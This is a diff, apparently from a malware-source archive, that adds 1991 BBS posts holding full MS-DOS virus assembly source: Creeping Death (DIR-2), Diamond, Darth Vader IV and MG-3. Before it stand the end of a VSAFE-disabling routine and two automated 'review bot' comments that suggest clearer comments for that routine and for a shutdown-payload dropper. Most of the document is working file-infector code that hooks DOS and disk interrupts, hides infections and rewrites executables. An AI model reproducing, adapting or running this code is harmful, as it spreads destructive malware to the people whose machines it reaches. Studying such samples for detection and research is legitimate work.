+ int 16h ;calls VSAFE-hooked interrupt: keyboard
+ ret ;exit
+
+ code ends
+ end begin
diff --git a/MSDOS/Virus.MSDOS.Unknown.vsource.asm b/MSDOS/Virus.MSDOS.Unknown.vsource.asm
new file mode 100644
index 00000000..fa25dd6c
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.vsource.asm
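Review bot: The comments on both branches at `mIRCCheck` (`; directory exists -> mIRC found!`) contradict what the code does: SetCurrentDirectoryA returns nonzero on success, which the `jne skipCreateDir ; directory exists` test at `goDir` itself relies on, yet `je installScript` is taken when `c:\mirc` is absent and `jne goOut` is taken when `c:\mirc32` is present, so `Script.ini` is written into whichever directory is current at that point (`C:\Temp` when the `goDir` step succeeded) rather than into an mIRC directory. For analysts the comments should state the actual behaviour, e.g. `; eax==0: c:\mirc absent -> script written to current dir`, so the drop location is not mis-documented. The file header also never says what the "payload date" is; the check `cmp word ptr [eax+6],5` reads the wDay field of SYSTEMTIME, so a comment such as `; payload: wDay == 5 (5th of any month) -> ExitWindowsEx(EWX_SHUTDOWN or EWX_FORCE)` would pin the trigger and explain the `1` and `4` flag values pushed before the call.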
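Review bot: `begin: call vslay` falls straight through into `vslay` once the call returns, so the INT 16h request is issued twice and the second `ret` terminates only because the .COM entry stack holds the zero word DOS pushes, sending control to the `INT 20h` at CS:0000 in the PSP; that reliance deserves a comment on `begin`, e.g. `; NOTE: vslay executes twice (call, then fall-through); final ret relies on PSP stack word 0 -> INT 20h`. The operands also mix radix: `mov ax,64001` sits next to `mov dx,5945h`, and writing it as `mov ax,0FA01h` keeps the same value in the notation the rest of the listing uses. The `;wakes up VSAFE` and `;asks VSAFE to de-install` comments describe a third-party interface that cannot be verified from this listing, so a header line marking them as the author's description rather than a documented contract would help readers.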
@@ -0,0 +1,1992 @@ +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (19:52) Number: 3544 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIR-2 Conf: (16) VIRUS +--------------------------------------------------------------------------- +; Creeping Death V 1.0 +; +; (C) Copyright 1991 by VirusSoft Corp. + +i13org = 5f8h +i21org = 5fch + + org 100h + + mov sp,600h + inc counter + xor cx,cx + mov ds,cx + lds ax,[0c1h] + add ax,21h + push ds + push ax + mov ah,30h + call jump + cmp al,4 + sbb si,si + mov drive+2,byte ptr -1 + mov bx,60h + mov ah,4ah + call jump + + mov ah,52h + call jump + push es:[bx-2] + lds bx,es:[bx] + +search: mov ax,[bx+si+15h] + cmp ax,70h + jne next + xchg ax,cx + mov [bx+si+18h],byte ptr -1 + mov di,[bx+si+13h] + mov [bx+si+13h],offset header + mov [bx+si+15h],cs +next: lds bx,[bx+si+19h] + cmp bx,-1 + jne search + jcxz install + + pop ds + mov ax,ds + add ax,[3] + inc ax + mov dx,cs + dec dx + cmp ax,dx + jne no_boot + add [3],61h +no_boot: mov ds,dx + mov [1],8 + + mov ds,cx + les ax,[di+6] + mov cs:str_block,ax + mov cs:int_block,es + + cld + mov si,1 +scan: dec si + lodsw + cmp ax,1effh + jne scan + mov ax,2cah + cmp [si+4],ax + je right + cmp [si+5],ax + jne scan +right: lodsw + push cs + pop es + mov di,offset modify+1 + stosw + xchg ax,si + mov di,offset i13org + cli + movsw + movsw + + mov dx,0c000h +fdsk1: mov ds,dx + xor si,si + lodsw + cmp ax,0aa55h + jne fdsk4 + cbw + lodsb + mov cl,9 + sal ax,cl +fdsk2: cmp [si],6c7h + jne fdsk3 + cmp [si+2],4ch + jne fdsk3 + push dx +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (19:52) Number: 3545 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIR-2 Conf: (16) VIRUS +--------------------------------------------------------------------------- + push [si+4] + jmp short death +install: int 20h +file: db "c:",255,0 +fdsk3: inc si + 
cmp si,ax + jb fdsk2 +fdsk4: inc dx + cmp dh,0f0h + jb fdsk1 + + sub sp,4 +death: push cs + pop ds + mov bx,[2ch] + mov es,bx + mov ah,49h + call jump + xor ax,ax + test bx,bx + jz boot + mov di,1 +seek: dec di + scasw + jne seek + lea si,[di+2] + jmp short exec +boot: mov es,[16h] + mov bx,es:[16h] + dec bx + xor si,si +exec: push bx + mov bx,offset param + mov [bx+4],cs + mov [bx+8],cs + mov [bx+12],cs + pop ds + push cs + pop es + + mov di,offset f_name + push di + mov cx,40 + rep movsw + push cs + pop ds + + mov ah,3dh + mov dx,offset file + call jump + pop dx + + mov ax,4b00h + call jump + mov ah,4dh + call jump + mov ah,4ch + +jump: pushf + call dword ptr cs:[i21org] + ret + + +;--------Installation complete + +i13pr: mov ah,3 + jmp dword ptr cs:[i13org] + + +main: push ax ; driver + push cx ; strategy block + push dx + push ds + push si + push di + + push es + pop ds + mov al,[bx+2] + + cmp al,4 ; Input + je input + cmp al,8 + je output + cmp al,9 + je output + + call in + cmp al,2 ; Build BPB + jne ppp ; + lds si,[bx+12h] + mov di,offset bpb_buf + mov es:[bx+12h],di + mov es:[bx+14h],cs + push es + push cs + pop es + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (19:52) Number: 3546 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIR-2 Conf: (16) VIRUS +--------------------------------------------------------------------------- + mov cx,16 + rep movsw + pop es + push cs + pop ds + mov al,[di+2-32] + cmp al,2 + adc al,0 + cbw + cmp [di+8-32],0 + je m32 + sub [di+8-32],ax + jmp short ppp +m32: sub [di+15h-32],ax + sbb [di+17h-32],0 + +ppp: pop di + pop si + pop ds + pop dx + pop cx + pop ax +rts: retf + +output: mov cx,0ff09h + call check + jz inf_sec + call in + jmp short inf_dsk + +inf_sec: jmp _inf_sec +read: jmp _read +read_: add sp,16 + jmp short ppp + +input: call check + jz read +inf_dsk: mov byte ptr [bx+2],4 + cld + lea si,[bx+0eh] + mov cx,8 +save: lodsw + push 
ax + loop save + mov [bx+14h],1 + call driver + jnz read_ + mov byte ptr [bx+2],2 + call in + lds si,[bx+12h] + mov ax,[si+6] + add ax,15 + mov cl,4 + shr ax,cl + mov di,[si+0bh] + add di,di + stc + adc di,ax + push di + cwd + mov ax,[si+8] + test ax,ax + jnz more + mov ax,[si+15h] + mov dx,[si+17h] +more: xor cx,cx + sub ax,di + sbb dx,cx + mov cl,[si+2] + div cx + cmp cl,2 + sbb ax,-1 + push ax + call convert + mov byte ptr es:[bx+2],4 + mov es:[bx+14h],ax + call driver +again: lds si,es:[bx+0eh] + add si,dx + sub dh,cl + adc dx,ax + mov cs:gad+1,dx + cmp cl,1 + je small + mov ax,[si] + and ax,di + cmp ax,0fff7h + je bad + cmp ax,0ff7h + je bad + cmp ax,0ff70h + jne ok +bad: pop ax + dec ax + push ax + call convert + jmp short again + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (19:52) Number: 3547 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIR-2 Conf: (16) VIRUS +--------------------------------------------------------------------------- +small: not di + and [si],di + pop ax + push ax + inc ax + push ax + mov dx,0fh + test di,dx + jz here + inc dx + mul dx +here: or [si],ax + pop ax + call convert + mov si,es:[bx+0eh] + add si,dx + mov ax,[si] + and ax,di +ok: mov dx,di + dec dx + and dx,di + not di + and [si],di + or [si],dx + + cmp ax,dx + pop ax + pop di + mov cs:pointer+1,ax + je _read_ + mov dx,[si] + push ds + push si + call write + pop si + pop ds + jnz _read_ + call driver + cmp [si],dx + jne _read_ + dec ax + dec ax + mul cx + add ax,di + adc dx,0 + push es + pop ds + mov [bx+12h],2 + mov [bx+14h],ax + test dx,dx + jz less + mov [bx+14h],-1 + mov [bx+1ah],ax + mov [bx+1ch],dx +less: mov [bx+10h],cs + mov [bx+0eh],100h + call write + +_read_: std + lea di,[bx+1ch] + mov cx,8 +load: pop ax + stosw + loop load +_read: call in + + mov cx,9 +_inf_sec: + mov di,es:[bx+12h] + lds si,es:[bx+0eh] + sal di,cl + xor cl,cl + add di,si + xor dl,dl + push ds + push si + 
call find + jcxz no_inf + call write + and es:[bx+4],byte ptr 07fh +no_inf: pop si + pop ds + inc dx + call find + jmp ppp + +;--------Subroutines + +find: mov ax,[si+8] + cmp ax,"XE" + jne com + cmp [si+10],al + je found +com: cmp ax,"OC" + jne go_on + cmp byte ptr [si+10],"M" + jne go_on + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (19:52) Number: 3548 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIR-2 Conf: (16) VIRUS +--------------------------------------------------------------------------- +found: test [si+1eh],0ffc0h ; >4MB + jnz go_on + test [si+1dh],03ff8h ; <2048B + jz go_on + test [si+0bh],byte ptr 1ch + jnz go_on + test dl,dl + jnz rest +pointer: mov ax,1234h + cmp ax,[si+1ah] + je go_on + xchg ax,[si+1ah] +gad: xor ax,1234h + mov [si+14h],ax + loop go_on +rest: xor ax,ax + xchg ax,[si+14h] + xor ax,cs:gad+1 + mov [si+1ah],ax +go_on: ;rol cs:gad+1,1 + db 2eh,0d1h,6 + dw offset gad+1 + add si,32 + cmp di,si + jne find + ret + +check: mov ah,[bx+1] +drive: cmp ah,-1 + mov cs:[drive+2],ah + jne changed + push [bx+0eh] + mov byte ptr [bx+2],1 + call in + cmp byte ptr [bx+0eh],1 + pop [bx+0eh] + mov [bx+2],al +changed: ret + +write: cmp byte ptr es:[bx+2],8 + jae in + mov byte ptr es:[bx+2],4 + mov si,70h + mov ds,si +modify: mov si,1234h + push [si] + push [si+2] + mov [si],offset i13pr + mov [si+2],cs + call in + pop [si+2] + pop [si] + ret + +driver: mov es:[bx+12h],1 +in: + db 09ah +str_block: + dw ?,70h + db 09ah +int_block: + dw ?,70h + test es:[bx+4],byte ptr 80h + ret + +convert: cmp ax,0ff0h + jae fat_16 + mov si,3 + xor cs:[si+gad-1],si + mul si + shr ax,1 + mov di,0fffh + jnc cont + mov di,0fff0h + jmp short cont +fat_16: mov si,2 + mul si + mov di,0ffffh +cont: mov si,512 + div si +header: inc ax + ret + +counter: dw 0 + + dw 842h + dw offset main + dw offset rts + db 7fh + +param: dw 0,80h,?,5ch,?,6ch,? + +bpb_buf: db 32 dup(?) +f_name: db 80 dup(?) 
+ +;--------The End. + + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (19:52) Number: 3549 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIR-2 Conf: (16) VIRUS +--------------------------------------------------------------------------- + +--- + RonMail 1.0 Programmer's Inn - Home of FeatherNet (619)-446-4506 +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:00) Number: 3550 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIAMOND Conf: (16) VIRUS +--------------------------------------------------------------------------- +; The Diamond Virus +; +; Version 2.10 +; +; also known as: +; V1024, V651, The EGN Virus +; +; Basic release: 5-Aug-1989 +; Last patch: 5-May-1990 +; +; COPYRIGHT: +; +; This program is (c) Copyright 1989,1990 Damage, Inc. +; Permission is granted to distribute this source provided the tittle +page is +; preserved. +; Any fee can be charged for distribution of this source, however, +Damage, Inc. +; distributes it freely. +; You are specially prohibited to use this program for military +purposes. +; Damage, Inc. is not liable for any kind of damages resulting from +the use of +; or the inability to use this software. 
+; +; To assemble this program use Turbo Assembler 1.0 + + .radix 16 + .model tiny + .code +code_len = top_code-main_entry +data_len = top_data-top_code +main_entry: + call locate_address +gen_count dw 0 +locate_address: + xchg ax,bp + cld + pop bx + inc word ptr cs:[bx] + mov ax,0d5aa + int 21 + cmp ax,2a03 + jz all_done + mov ax,sp + inc ax + mov cl,4 + shr ax,cl + inc ax + mov dx,ss + add ax,dx + mov dx,ds + dec dx + mov es,dx + xor di,di + mov cx,(top_data-main_entry-1)/10+1 + mov dx,[di+2] + sub dx,cx + cmp dx,ax + jc all_done + cli + sub es:[di+3],cx + mov [di+2],dx + mov es,dx + lea si,[bx+main_entry-gen_count] + mov cx,top_code-main_entry + rep + db 2e + movsb + push ds + mov ds,cx + mov si,20 + lea di,[di+old_vector-top_code] + org $-1 + mov ax,offset dos_handler + xchg ax,[si+64] + stosw + mov ax,es + xchg ax,[si+66] + stosw + mov ax,offset time_handler + xchg ax,[si] + stosw + xchg ax,dx + xchg ax,[si+2] + stosw + mov ax,24 + stosw + pop ds + push ds + pop es + sti +all_done: + lea si,[bx+exe_header-gen_count] + db 2e + lodsw + cmp ax,'ZM' + jz exit_exe +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:00) Number: 3551 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIAMOND Conf: (16) VIRUS +--------------------------------------------------------------------------- + mov di,100 + push di + stosw + movsb + xchg ax,bp + ret +exit_exe: + mov dx,ds + add dx,10 + add cs:[si+return_address+2-exe_header-2],dx + org $-1 + add dx,cs:[si+stack_offset+2-exe_header-2] + org $-1 + mov ss,dx + mov sp,cs:[si+stack_offset-exe_header-2] + org $-1 + xchg ax,bp + jmp dword ptr +cs:[si+return_address-exe_header-2] + org $-1 +infect: + mov dx,offset exe_header + mov cx,top_header-exe_header + mov ah,3f + int 21 + jc do_exit + sub cx,ax + jnz go_error + mov di,offset exe_header + les ax,[di+ss_offset-exe_header] + org $-1 + mov [di+stack_offset-exe_header],es + org $-1 + mov 
[di+stack_offset+2-exe_header],ax + org $-1 + les ax,[di+ip_offset-exe_header] + org $-1 + mov [di+return_address-exe_header],ax + org $-1 + mov [di+return_address+2-exe_header],es + org $-1 + mov dx,cx + mov ax,4202 + int 21 + jc do_exit + mov [di+file_size-exe_header],ax + org $-1 + mov [di+file_size+2-exe_header],dx + org $-1 + mov cx,code_len + cmp ax,cx + sbb dx,0 + jc do_exit + xor dx,dx + mov si,'ZM' + cmp si,[di] + jz do_put_image + cmp [di],'MZ' + jz do_put_image + cmp ax,0fe00-code_len + jc put_image +go_error: + stc +do_exit: + ret +do_put_image: + cmp dx,[di+max_size-exe_header] + org $-1 + jz go_error + mov [di],si +put_image: + mov ah,40 + int 21 + jc do_exit + sub cx,ax + jnz go_error + mov dx,cx + mov ax,4200 + int 21 + jc do_exit + mov ax,[di+file_size-exe_header] + org $-1 + cmp [di],'ZM' + jnz com_file + mov dx,[di+file_size-exe_header+2] + org $-1 + mov cx,4 + push di + mov si,[di+header_size-exe_header] + org $-1 + xor di,di +shift_size: + shl si,1 + rcl di,1 + loop shift_size + sub ax,si + sbb dx,di + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:00) Number: 3552 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIAMOND Conf: (16) VIRUS +--------------------------------------------------------------------------- + pop di + mov cl,0c + shl dx,cl + mov [di+ip_offset-exe_header],ax + org $-1 + mov [di+cs_offset-exe_header],dx + org $-1 + add dx,(code_len+data_len+100-1)/10+1 + org $-1 + mov [di+sp_offset-exe_header],ax + org $-1 + mov [di+ss_offset-exe_header],dx + org $-1 + add word ptr +[di+min_size-exe_header],(data_len+100-1)/10+1 + org $-2 + mov ax,[di+min_size-exe_header] + org $-1 + cmp ax,[di+max_size-exe_header] + org $-1 + jc adjust_size + mov [di+max_size-exe_header],ax + org $-1 +adjust_size: + mov ax,[di+last_page-exe_header] + org $-1 + add ax,code_len + push ax + and ah,1 + mov [di+last_page-exe_header],ax + org $-1 + pop ax + mov cl,9 + shr 
ax,cl + add [di+page_count-exe_header],ax + org $-1 + jmp short put_header +com_file: + sub ax,3 + mov byte ptr [di],0e9 + mov [di+1],ax +put_header: + mov dx,offset exe_header + mov cx,top_header-exe_header + mov ah,40 + int 21 + jc error + cmp ax,cx + jz reset +error: + stc +reset: + ret +find_file: + pushf + push cs + call calldos + test al,al + jnz cant_find + push ax + push bx + push es + mov ah,51 + int 21 + mov es,bx + cmp bx,es:[16] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2f + int 21 + pop ax + inc al + jnz fcb_standard + add bx,7 +fcb_standard: + mov ax,es:[bx+17] + and ax,1f + xor al,1e + jnz not_infected + and byte ptr es:[bx+17],0e0 + sub es:[bx+1dh],code_len + sbb es:[bx+1f],ax +not_infected: + pop es + pop bx + pop ax +cant_find: + iret +dos_handler: + cmp ah,4bh + jz exec + cmp ah,11 + jz find_file + cmp ah,12 + jz find_file + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:00) Number: 3553 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIAMOND Conf: (16) VIRUS +--------------------------------------------------------------------------- + cmp ax,0d5aa + jnz calldos + not ax +fail: + mov al,3 + iret +exec: + cmp al,2 + jnc calldos + push ds + push es + push ax + push bx + push cx + push dx + push si + push di + mov ax,3524 + int 21 + push es + push bx + mov ah,25 + push ax + push ds + push dx + push cs + pop ds + mov dx,offset fail + int 21 + pop dx + pop ds + mov ax,4300 + int 21 + jc exit + test cl,1 + jz open + dec cx + mov ax,4301 + int 21 +open: + mov ax,3d02 + int 21 + jc exit + xchg ax,bx + mov ax,5700 + int 21 + jc close + mov al,cl + or cl,1f + dec cx + xor al,cl + jz close + push cs + pop ds + push cx + push dx + call infect + pop dx + pop cx + jc close + mov ax,5701 + int 21 +close: + mov ah,3e + int 21 +exit: + pop ax + pop dx + pop ds + int 21 + pop di + pop si + pop dx + pop cx + pop bx + pop ax + pop es + pop ds +calldos: + 
jmp cs:[old_vector] + .radix 10 +adrtbl dw +1680,1838,1840,1842,1996,1998,2000,2002,2004,2154,2156 + dw +2158,2160,2162,2164,2166,2316,2318,2320,2322,2324,2478 + dw 2480,2482,2640 +diftbl dw +-324,-322,-156,158,-318,-316,318,156,162,316,164,-322 + dw +-162,-322,322,322,-324,-158,164,316,-324,324,-316,-164 + dw 324 +valtbl dw +3332,3076,3076,3076,3588,3588,3588,3588,3588,3844,3844 + dw +3844,3844,3844,3844,3844,2564,2564,2564,2564,2564,2820 + dw 2820,2820,2308 +xlatbl dw + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:00) Number: 3554 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIAMOND Conf: (16) VIRUS +--------------------------------------------------------------------------- +-324,316,-164,156,-322,318,-162,158,-318,322,-158,162 + dw -316,324,-156,164 + .radix 16 +time_handler: + push ds + push es + push ax + push bx + push cx + push dx + push si + push di + push cs + pop ds + cld + mov dx,3da + mov cx,19 + mov si,offset count + mov ax,[si] + test ah,ah + jnz make_move + mov al,ah + mov es,ax + cmp al,es:[46dh] + jnz exit_timer + mov ah,0f + int 10 + cmp al,2 + jz init_diamond + cmp al,3 + jnz exit_timer +init_diamond: + inc byte ptr [si+1] + sub bl,bl + add bh,0b8 + mov [si+2],bx + mov es,bx +wait_snow: + in al,dx + test al,8 + jz wait_snow + mov si,offset valtbl +build_diamond: + mov di,[si+adrtbl-valtbl] + movsw + loop build_diamond +exit_timer: + pop di + pop si + pop dx + pop cx + pop bx + pop ax + pop es + pop ds + jmp cs:[old_timer] +count_down: + dec byte ptr [si] + jmp exit_timer +make_move: + test al,al + jnz count_down + inc byte ptr [si] + mov si,offset adrtbl +make_step: + push cx + push cs + pop es + lodsw + mov bx,ax + sub ax,140 + cmp ax,0d20 + jc no_xlat + test ax,ax + mov ax,[si+diftbl-adrtbl-2] + jns test_xlat + test ax,ax + js do_xlat + jmp short no_xlat +test_xlat: + test ax,ax + js no_xlat +do_xlat: + mov di,offset xlatbl + mov cx,10 + repnz scasw 
+ dec di + dec di + xor di,2 + mov ax,[di] + mov [si+diftbl-adrtbl-2],ax +no_xlat: + mov ax,[si-2] + add ax,[si+diftbl-adrtbl-2] + mov [si-2],ax + mov cx,19 + mov di,offset adrtbl + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:00) Number: 3555 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DIAMOND Conf: (16) VIRUS +--------------------------------------------------------------------------- +lookup: + jcxz looked_up + repnz scasw + jnz looked_up + cmp si,di + jz lookup + mov [si-2],bx + mov ax,[si+diftbl-adrtbl-2] + xchg ax,[di+diftbl-adrtbl-2] + mov [si+diftbl-adrtbl-2],ax + jmp lookup +looked_up: + mov es,[homeadr] + mov di,bx + xor bx,bx + call out_char + mov di,[si-2] + mov bx,[si+valtbl-adrtbl-2] + call out_char + pop cx + loop make_step + jmp exit_timer +out_char: + in al,dx + test al,1 + jnz out_char +check_snow: + in al,dx + test al,1 + jz check_snow + xchg ax,bx + stosw + ret +stack_offset dd ? +return_address dd ? + db '7106286813' +exe_header: int 20 +last_page: nop +top_code: + db ? +page_count dw ? + dw ? +header_size dw ? +min_size dw ? +max_size dw ? +ss_offset dw ? +sp_offset dw ? + dw ? +ip_offset dw ? +cs_offset dw ? +top_header: +file_size dd ? +old_vector dd ? +old_timer dd ? +count db ? +flag db ? +homeadr dw ? 
+top_data: + end + +--- + RonMail 1.0 Programmer's Inn - Home of FeatherNet (619)-446-4506 +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:06) Number: 3556 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DARTH VADER Conf: (16) VIRUS +--------------------------------------------------------------------------- +;********************************************************************* +********** +;* +* +;* D A R T H V A D E R IV +* +;* +* +;* (C) - Copyright 1991 by Waleri Todorov, CICTT-Sofia +* +;* All Rights Reserved +* +;* +& +;* Enchanced by: Lazy Wizard +& +;* +& +;* Turbo Assembler 2.0 +& +;* +& +;********************************************************************* +********** + + + .model tiny + .code + + org 100h + +Start: + call NextLine +First3: + int 20h + int 3 +NextLine: + pop bx + push ax + xor di,di + mov es,di + mov es,es:[2Bh*4+2] + mov cx,1000h + call SearchZero + jc ReturnControl + xchg ax,si + inc si +SearchTable: + dec si + db 26h + lodsw + cmp ax,8B2Eh + jne SearchTable + db 26h + lodsb + cmp al,75h + je ReturnControl + cmp al,9Fh + jne SearchTable + mov si,es:[si] + mov cx,LastByte-Start + lea ax,[di+Handle-Start] + org $-1 + xchg ax,es:[si+80h] + sub ax,di + sub ax,cx + mov [bx+OldWrite-Start-2],ax + mov word ptr [bx+NewStart+1-Start-3],di + lea si,[bx-3] + rep movsb +ReturnControl: + pop ax + push ss + pop es + mov di,100h + lea si,[bx+First3-Start-3] + push di + movsw + movsb + ret +SearchZero: + xor ax,ax + inc di + push cx + push di + mov cx,(LastByte-Start-1)/2+1 + repe scasw + pop di + pop cx + je FoundPlace + loop SearchZero + stc +FoundPlace: + ret +Handle: + push bp + call NextHandle +NextHandle: +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:06) Number: 3557 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: DARTH VADER Conf: (16) VIRUS 
+--------------------------------------------------------------------------- + pop bp + push es + push ax + push bx + push cx + push si + push di + test ch,ch + je Do + mov ax,1220h + int 2Fh + mov bl,es:[di] + mov ax,1216h + int 2Fh + cmp es:[di+29h],'MO' + jne Do + cmp word ptr es:[di+15h],0 + jne Do + push ds + pop es + mov di,dx + mov ax,[di] + mov [bp+First3-NextHandle],ax + mov al,[di+2] + mov [bp+First3+2-NextHandle],al + call SearchZero + jc Do + push di +NewStart: + mov si,0 + mov cx,(LastByte-Start-1)/2 + cli + rep + db 36h + movsw + sti + mov di,dx + mov al,0E9h + stosb + pop ax + sub ax,di + dec ax + dec ax + stosw +Do: + pop di + pop si + pop cx + pop bx + pop ax + pop es + pop bp +OldWrite: + jmp start + +LastByte label byte + + end Start + +--- + RonMail 1.0 Programmer's Inn - Home of FeatherNet (619)-446-4506 +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:07) Number: 3558 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: MG 3 Conf: (16) VIRUS +--------------------------------------------------------------------------- +; (C) Copyright VirusSoft Corp. Sep., 1990 +; +; This is the SOURCE file of last version of MASTER,(V500),(MG) ect. +; virus, distributed by VirusSoft company . First version was made +; in May., 1990 . Please don't make any corections in this file ! +; +; Bulgaria, Varna +; Sep. 
27, 1990 + + + + ofs = 201h + len = offset end-ofs + + call $+6 + + org ofs + +first: dw 020cdh + db 0 + + pop di + dec di + dec di + mov si,[di] + dec di + add si,di + push cs + push di + cld + movsw + movsb + xchg ax,dx + + mov ax,4b04h + int 21h + jnc residnt + + xor ax,ax + mov es,ax + mov di,ofs+3 + mov cx,len-3 + rep movsb + + les di,[6] + mov al,0eah + dec cx + repne scasb + les di,es:[di] ; Searching for the INT21 vector + sub di,-1ah-7 + + db 0eah + dw offset jump,0 ; jmp far 0000:jump + +jump: push es + pop ds + mov si,[di+3-7] ; + lodsb ; + cmp al,68h ; compare DOS Ver + mov [di+4-7],al ; Change CMP AH,CS:[????] + mov [di+2-7],0fc80h ; + mov [di-7],0fccdh ; + + push cs + pop ds + + mov [1020],di ; int 0ffh + mov [1022],es + + mov beg-1,byte ptr not3_3-beg + jb not3.3 ; CY = 0 --> DOS Ver > or = 3.30 + mov beg-1,byte ptr 0 + mov [7b4h],offset pr7b4 + mov [7b6h],cs ; 7b4 + +not3.3: mov al,0a9h ; Change attrib +cont: repne scasb + cmp es:[di],0ffd8h + jne cont + mov al,18h + stosb + + push ss + pop ds + + push ss + pop es + +residnt: xchg ax,dx + retf ; ret far + +;--------Interrupt process--------; + +i21pr: push ax + push dx + push ds + push cx + push bx +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:07) Number: 3559 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: MG 3 Conf: (16) VIRUS +--------------------------------------------------------------------------- + push es + +if4b04: cmp ax,4b04h + je rti + + xchg ax,cx + mov ah,02fh + int 0ffh + +if11_12: cmp ch,11h + je yes + cmp ch,12h + jne inffn +yes: xchg ax,cx + int 0ffh + push ax + test es:byte ptr [bx+19],0c0h + jz normal + sub es:[bx+36],len +normal: pop ax +rti: pop es + pop bx + pop cx + add sp,12 + iret + +inffn: mov ah,19h + int 0ffh + push ax + +if36: cmp ch,36h ; -free bytes + je beg_36 +if4e: cmp ch,4eh ; -find first FM + je beg_4b +if4b: cmp ch,4bh ; -exec + je beg_4b +if47: cmp ch,47h ; -directory 
info + jne if5b + cmp al,2 + jae begin ; it's hard-disk +if5b: cmp ch,5bh ; -create new + je beg_4b +if3c_3d: shr ch,1 ; > -open & create + cmp ch,1eh ; - + je beg_4b + + jmp rest + +beg_4b: mov ax,121ah + xchg dx,si + int 2fh + xchg ax,dx + xchg ax,si + +beg_36: mov ah,0eh ; change current drive + dec dx ; + int 0ffh ; + +begin: + push es ; save DTA address + push bx ; + sub sp,44 + mov dx,sp ; change DTA + push sp + mov ah,1ah + push ss + pop ds + int 0ffh + mov bx,dx + + push cs + pop ds + + mov ah,04eh + mov dx,offset file + mov cx,3 ; r/o , hidden + int 0ffh ; int 21h + jc lst + +next: test ss:[bx+21],byte ptr 80h + jz true +nxt: mov ah,4fh ; find next + int 0ffh + jnc next +lst: jmp last + +true: cmp ss:[bx+27],byte ptr 0fdh + ja nxt + mov [144],offset i24pr + mov [146],cs + + les ax,[4ch] ; int 13h + mov i13adr,ax + mov i13adr+2,es + jmp short $ +beg: mov [4ch],offset i13pr + mov [4eh],cs + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:07) Number: 3560 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: MG 3 Conf: (16) VIRUS +--------------------------------------------------------------------------- + ; +not3_3: push ss + pop ds + push [bx+22] ; time + + push [bx+24] ; date + + push [bx+21] ; attrib + + lea dx,[bx+30] ; ds : dx = offset file name + mov ax,4301h ; Change attrib !!! + pop cx + and cx,0feh ; clear r/o and CH + or cl,0c0h ; set Infect. 
attr + int 0ffh + + mov ax,03d02h ; open + int 0ffh ; int 21h + xchg ax,bx + + push cs + pop ds + + mov ah,03fh + mov cx,3 + mov dx,offset first + int 0ffh + + mov ax,04202h ; move fp to EOF + xor dx,dx + mov cx,dx + int 0ffh + mov word ptr cal_ofs+1,ax + + mov ah,040h + mov cx,len + mov dx,ofs + int 0ffh + jc not_inf + + mov ax,04200h + xor dx,dx + mov cx,dx + int 0ffh + + mov ah,040h + mov cx,3 + mov dx,offset cal_ofs + int 0ffh + +not_inf: mov ax,05701h + pop dx ; date + pop cx ; time + int 0ffh + + mov ah,03eh ; close + int 0ffh + + les ax,dword ptr i13adr + mov [4ch],ax ; int 13h + mov [4eh],es + +last: add sp,46 + pop dx + pop ds ; restore DTA + mov ah,1ah + int 0ffh + +rest: pop dx ; restore current drive + mov ah,0eh ; + int 0ffh ; + + pop es + pop bx + pop cx + pop ds + pop dx + pop ax + +i21cl: iret ; Return from INT FC + +i24pr: mov al,3 ; Critical errors + iret + +i13pr: cmp ah,3 + jne no + inc byte ptr cs:activ + dec ah +no: jmp dword ptr cs:i13adr + +pr7b4: db 2eh,0d0h,2eh + dw offset activ +; shr cs:activ,1 + jnc ex7b0 + inc ah +ex7b0: jmp dword ptr cs:[7b0h] + +;-------- + +file: db "*",32,".COM" + + +=========================================================================== + BBS: The Programmer's Inn +Date: 11-24-91 (20:07) Number: 3561 +From: AHMED DOGAN Refer#: NONE + To: ALL Recvd: NO +Subj: MG 3 Conf: (16) VIRUS +--------------------------------------------------------------------------- + +activ: db 0 + + dw offset i21pr ; int 0fch + dw 0 + +cal_ofs: db 0e8h + +end: + dw ? ; cal_ofs + +i13adr: dw ? + dw ? 
